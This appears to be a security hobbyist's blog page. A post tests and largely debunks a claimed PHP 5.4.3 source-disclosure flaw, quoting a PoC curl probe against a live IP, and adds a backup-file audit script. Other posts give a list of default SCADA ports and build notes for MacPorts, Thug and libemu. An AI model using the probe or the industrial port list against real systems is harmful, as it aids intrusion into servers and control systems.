PHP 5.4.3 (cli) Code Read Vulnerability?

Posted: June 15th, 2012 | Filed under: IT Related | 2 Comments

As posted on http://1337day.com/exploits/18605, cheki claimed that PHP 5.4.3 is vulnerable to a "code read" vulnerability: the PHP interpreter supposedly fails to execute the file once a ‘~’ symbol is appended to the file name, so the source is returned instead. Snipped from the PoC:

=============================================================

#Demo: [root@cheki]# curl 109.234.119.2/index.php~

result: <?php phpinfo(); ?>

#Target: http://localhost/index.php~

result: <?php phpinfo(); ?>
============================================================

[root@cheki]# curl 109.234.119.2/index.php

result: NULL

#Target: http://localhost/index.php

result: NULL

===========================================================

Ok.. Since I had a test machine (Ubuntu) SSHed earlier, I straight away added a new PPA repo (https://launchpad.net/~ondrej/+archive/php5) and installed PHP 5.4.3. So here is my version to verify the PoC:

xanda@vostro:~$ php -v
PHP 5.4.3-4~precise+1 (cli) (built: May 17 2012 13:00:25) 
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
 
 
xanda@vostro:~$ curl 127.0.0.1/index.php
<form action="" method="post">
<input type="text" name="lala">
<input type="submit">
</form>
 
 
xanda@vostro:~$ curl 127.0.0.1/index.php~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php~ was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>

Hurmmmm okkkk…. I haven’t tested it on Fedora release 17 (Beefy Miracle) as claimed by the author, but I think this is… You name it..

Please take note that most GUI-based text editors (e.g. Gedit) will (auto)save your edited file into a backup file with the same file name but ending with ‘~’… Just like in the PoC, huh? That backup sits in the web root as a plain file the web server has no PHP handler for, so it is served as text.
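The editor-backup exposure described above can be audited from the server side. The script below is an added example (not code from the original post or from the PoC author): it walks a constructed document root, flags names that match common editor backup/swap patterns, and reports those whose content carries a PHP open tag, i.e. exactly the files a web server with no handler for `index.php~` would return verbatim.

```python
"""Audit a web root for editor backup files that would be served as plain text.
Added example; the sample docroot below is constructed, not taken from the post."""
import os
import re
import tempfile

# Names editors leave behind next to the file being edited:
#   index.php~ (Gedit/Emacs backup), index.php.bak/.orig/.old/.save,
#   .index.php.swp (Vim swap), #index.php# (Emacs autosave)
BACKUP_PATTERNS = [
    re.compile(r".+~$"),
    re.compile(r".+\.(bak|orig|old|save)$", re.IGNORECASE),
    re.compile(r"^\..+\.sw[a-p]$"),
    re.compile(r"^#.+#$"),
]
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)")


def is_backup_name(name):
    """True if the file name looks like an editor backup or swap file."""
    return any(p.match(name) for p in BACKUP_PATTERNS)


def find_exposed_backups(docroot):
    """Relative paths of backup files whose first 4 KiB contain a PHP open tag.
    A plain-text response for such a name is the PoC's "code read"."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if not is_backup_name(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(4096)
            if PHP_OPEN_TAG.search(head):
                findings.append(os.path.relpath(path, docroot))
    return sorted(findings)


# Constructed docroot resembling the post's test: a live script, its Gedit
# backup, a .bak copy with a secret, and a CSS backup that leaks no PHP source.
SAMPLE_DOCROOT = {
    "index.php": "<?php phpinfo(); ?>\n",
    "index.php~": "<?php phpinfo(); ?>\n",
    "admin/config.php.bak": "<?php $db_pass = 'hunter2'; ?>\n",
    "style.css~": "body { color: red }\n",
}


def demo():
    """Write SAMPLE_DOCROOT to a temp directory and audit it."""
    with tempfile.TemporaryDirectory(prefix="docroot-") as root:
        for rel, body in SAMPLE_DOCROOT.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(body)
        return find_exposed_backups(root)


if __name__ == "__main__":
    for hit in demo():
        print("exposed source:", hit)
```

Pair the audit with a web-server rule that refuses names ending in ~ (on Apache 2.2 a FilesMatch block carrying the Order allow,deny / Deny from all directives quoted in the update below).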

If anyone manages to test it on Fedora release 17 (Beefy Miracle), kindly drop me the result in the comment section. Thanks in advance.

Cheers 🙂

Mirror for the advisory: http://pastebin.com/H1tjRDpD

 

Update

1) @Netasq has given 2 workarounds for this issue.

  • http://twitter.com/Netasq/status/213647398025703425
    In case you can't update PHP to 5.4.4, a quick Apache fix #security (1/2)  Order allow,deny Deny from all

2) It’s not listed here (or have I missed it?): http://www.php.net/ChangeLog-5.php


Default SCADA Ports

Posted: June 14th, 2012 | Filed under: IT Related | No Comments

Just re-mirror for http://pastebin.com/EwCibKgc

# Default Scada Ports
 
- xflix
 
+-------+---------------------------------------+
| Port  | Description                           |
+-------+---------------------------------------+
| 502   | Modbus                                |
| 1089  | Foundation Fieldbus HSE               |
| 1090  | Foundation Fieldbus HSE               |
| 1091  | Foundation Fieldbus HSE               |
| 1541  | Foxboro/Invensys Foxboro DCS Informix |
| 1883  | MQ Telemetry Transport                |
| 2222  | EtherNet/IP                           |
| 3480  | OPC UA Discovery Server               |
| 4000  | Emerson/Fisher ROC Plus               |
| 4592  | Project/SCADA Node Primary Port       |
| 5050  | Telvent OASyS DNA                     |
| 5052  | Telvent OASyS DNA                     |
| 5065  | Telvent OASyS DNA                     |
| 5450  | OSIsoft PI Server                     |
| 10307 | ABB Ranger 2003                       |
| 10311 | ABB Ranger 2003                       |
| 10364 | ABB Ranger 2003                       |
| 10407 | ABB Ranger 2003                       |
| 10409 | ABB Ranger 2003                       |
| 10412 | ABB Ranger 2003                       |
| 10414 | ABB Ranger 2003                       |
| 10428 | ABB Ranger 2003                       |
| 10431 | ABB Ranger 2003                       |
| 10447 | ABB Ranger 2003                       |
| 10449 | ABB Ranger 2003                       |
| 12316 | ABB Ranger 2003                       |
| 12645 | ABB Ranger 2003                       |
| 12647 | ABB Ranger 2003                       |
| 13722 | ABB Ranger 2003                       |
| 11001 | Johnson Controls Metasys N1           |
| 12135 | Telvent OASyS DNA                     |
| 13724 | ABB Ranger 2003                       |
| 13782 | ABB Ranger 2003                       |
| 14592 | SCADA Node Secondary Port             |
| 18000 | Iconic Genesis32 GenBroker (TCP)      |
| 19999 | DNP                                   |
| 20000 | DNP3                                  |
| 34962 | PROFINET                              |
| 34963 | PROFINET                              |
| 34964 | PROFINET                              |
| 34980 | EtherCAT                              |
| 38589 | ABB Ranger 2003                       |
| 38593 | ABB Ranger 2003                       |
| 38000 | SNC GENe                              |
| 38011 | SNC GENe                              |
| 38014 | SNC GENe                              |
| 38200 | SNC GENe                              |
| 38210 | SNC GENe                              |
| 38301 | SNC GENe                              |
| 38400 | SNC GENe                              |
| 38600 | ABB Ranger 2003                       |
| 38700 | SNC GENe                              |
| 38971 | ABB Ranger 2003                       |
| 39129 | ABB Ranger 2003                       |
| 39278 | ABB Ranger 2003                       |
| 44818 | EtherNet/IP                           |
| 45678 | Foxboro/Invensys Foxboro DCS AIMAPI   |
| 47808 | BACnet/IP                             |
| 50001 | Siemens Spectrum Power TG             |
| 50018 | Siemens Spectrum Power TG             |
| 50020 | Siemens Spectrum Power TG             |
| 50025 | Siemens Spectrum Power TG             |
| 50110 | Siemens Spectrum Power TG             |
| 55000 | FL-net Reception                      |
| 55003 | FL-net Transmission                   |
| 55550 | Foxboro/Invensys Foxboro DCS FoxAPI   |
| 56001 | Telvent OASyS DNA                     |
| 62900 | SNC GENe                              |
| 62911 | SNC GENe                              |
| 62924 | SNC GENe                              |
| 62930 | SNC GENe                              |
| 62938 | SNC GENe                              |
| 62956 | SNC GENe                              |
| 62963 | SNC GENe                              |
| 62981 | SNC GENe                              |
| 62985 | SNC GENe                              |
| 62992 | SNC GENe                              |
| 63012 | SNC GENe                              |
| 63027 | SNC GENe                              |
| 63041 | SNC GENe                              |
| 63075 | SNC GENe                              |
| 63079 | SNC GENe                              |
| 63082 | SNC GENe                              |
| 63088 | SNC GENe                              |
| 63094 | SNC GENe                              |
| 65443 | SNC GENe                              |
+-------+---------------------------------------+

Fixing pcre++ looping bug in Macports

Posted: May 30th, 2012 | Filed under: IT Related | No Comments

I’ve updated my MacPorts to version 2.1.1 and all of a sudden the following error/warning occurred:

Warning: No port pcre++ found in the index; can't rebuild
--->  Found 0 broken port(s), determining rebuild order
--->  Rebuilding in order
--->  Scanning binaries for linking errors: 100.0%
--->  Found 1 broken file(s), matching files to ports
Warning: No port pcre++ found in the index; can't rebuild
--->  Found 0 broken port(s), determining rebuild order
--->  Rebuilding in order
--->  Scanning binaries for linking errors: 100.0%
--->  Found 1 broken file(s), matching files to ports

This is because pcre++ has been replaced by the pcrexx package, so the rebuild step keeps looking for a port that no longer exists in the index. The quick solution:

sudo port -f deactivate pcre++
sudo port -f activate pcrexx

In my case, the output is as below:

--->  The following versions of pcrexx are currently installed:
--->      pcrexx @0.9.5_1
--->      pcrexx @0.9.5_2
Error: port activate failed: Registry error: Please specify the full version as recorded in the port registry.

The activate step needs the full version string as recorded in the registry, so choose the latest installed version and activate it:

sudo port -f activate pcrexx @0.9.5_2

Installation of Thug (a Python low-interaction honeyclient) on Ubuntu/Debian

Posted: May 21st, 2012 | Filed under: IT Related | 2 Comments

Thug is a Python low-interaction honeyclient aimed at mimicking the behaviour of a web browser in order to detect and emulate malicious contents. [1]

I’m impressed with the artwork of @buffer AKA Angelo in his previous project, phoneyc, and started to take a detailed look at and hack on the project. While only one hack was finished on my side, Angelo already released a brand new honeyclient based on Python + the V8 JS engine called Thug. What a wonderful idea + talent.

Here is some useful information that might help you build and compile Thug + V8 on an Ubuntu/Debian machine:

 

    • Install some dependencies
      sudo apt-get install python-setuptools build-essential git-core subversion scons python-chardet python-html5lib libboost-python-dev libboost-dev python-pefile python-httplib2 python-cssutils libboost-thread-dev libc6-dev libreadline-dev libboost-system-dev
      sudo easy_install beautifulsoup4
      sudo apt-get install python-magic python-pydot
    • Obtain the code via svn and git
      cd ~
      git clone https://github.com/buffer/thug.git
      cd ~/thug/
      svn checkout http://v8.googlecode.com/svn/trunk/ v8
    • Apply Thug’s patches for V8
      cp patches/V8-patch* .
      patch -p0 < V8-patch1.diff
      patch -p0 < V8-patch2.diff
      rm V8-patch*
    • Build and compile the Python wrapper for V8. This process compiles the V8 engine at the same time
      cd /tmp/
      svn checkout http://pyv8.googlecode.com/svn/trunk/ pyv8
      export V8_HOME=$HOME/thug/v8
      cd pyv8 && python setup.py build
      sudo python setup.py install
    • If you come across the following warning, simply ignore it
      #######################################################
      #  WARNING: Building V8 with SCons is deprecated and  #
      #  will not work much longer. Please switch to using  #
      #  the GYP-based build now. Instructions are at       #
      #  http://code.google.com/p/v8/wiki/BuildingWithGYP.  #
      #######################################################
    • Now test your installation
      cd ~/thug/src
      python thug.py
    • With the previous test, you will get something similar to this:
Synopsis:
    Thug: Pure Python honeyclient implementation
 
    Usage:
        python thug.py [ options ] url
 
    Options:
        -h, --help          	Display this help information
        -o, --output=       	Log to a specified file
        -r, --referer=      	Specify a referer
        -p, --proxy=        	Specify a proxy (see below for format and supported schemes)
        -l, --local         
        -v, --verbose       	Enable verbose mode    
        -d, --debug         	Enable debug mode
        -u, --useragent=    	Select a user agent (see below for values, default: xpie61)
 
    Proxy Format:
        scheme://[username:password@]host:port (supported schemes:  http, socks4, socks5)
 
    Available User-Agents:
	xpie60			Internet Explorer 6.0 (Windows XP)
	xpie61			Internet Explorer 6.1 (Windows XP)
	xpie70			Internet Explorer 7.0 (Windows XP)
	xpie80			Internet Explorer 8.0 (Windows XP)
	w2kie60			Internet Explorer 6.0 (Windows 2000)
	w2kie80			Internet Explorer 8.0 (Windows 2000)

Reference:
[1] https://github.com/buffer/thug


Installation of libemu and pylibemu on Ubuntu/Debian

Posted: May 16th, 2012 | Filed under: IT Related | 5 Comments

libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. It is designed to be used within network intrusion detection/prevention systems and honeypots. [1]

Here is some useful information that might help you build and compile libemu on an Ubuntu machine:

  • Install some dependencies for the building process
    sudo apt-get install build-essential git-core autoconf libtool python-dev
  • Obtain libemu via Git
    cd /tmp/
    git clone git://git.carnivore.it/libemu.git
  • Configure and install
    cd /tmp/libemu/
    autoreconf -v -i
    ./configure --enable-python-bindings --prefix=/opt/libemu
    sudo make install
    sudo ldconfig -n /opt/libemu/lib

Now install pylibemu, the Python wrapper for the libemu library:

  • Install some dependencies for the building process
    sudo apt-get install python-dev python-setuptools
  • Obtain pylibemu via Git
    cd /tmp/
    git clone https://github.com/buffer/pylibemu.git
  • Build and install (the ld.so.conf.d entry lets the loader find libemu under /opt/libemu/lib)
    cd /tmp/pylibemu/
    sudo sh -c "echo /opt/libemu/lib > /etc/ld.so.conf.d/pylibemu.conf"
    python setup.py build
    sudo python setup.py install

Yerp.. you are good to go.

Reference:
[1] http://libemu.carnivore.it